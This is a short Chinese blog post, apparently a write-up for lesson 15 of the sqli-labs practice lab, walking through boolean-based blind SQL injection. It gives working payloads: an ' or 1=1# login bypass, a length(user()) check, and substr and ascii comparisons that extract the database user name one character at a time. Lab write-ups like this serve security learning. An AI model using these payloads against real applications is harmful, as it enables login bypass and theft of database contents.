sql-labs第十五题

1 寻找SQL注入

根据题目这是一个基于布尔类型的盲注

1.1 构造永真条件

提交 ' or 1=1# 登录成功

2 利用SQL注入

eg:推断数据库用户名

  1. 推断用户名长度
    payload:' or length(user())=14#

  2. 逐字符推断用户名
    第一个字符 payload:' or substr(user(),1,1)='r'#

第二个字符 payload:' or substr(user(),2,1)='o'#
......
...
直到推断出全部14个字符

PS:可将字符转换为ASCII码,然后通过值的大小来判断,可加快推断速度。

eg:' or ascii(substr(user(),2,1))>110#

posted @ 2020-08-19 23:41  爱十三的柒  阅读(265)  评论(0编辑  收藏  举报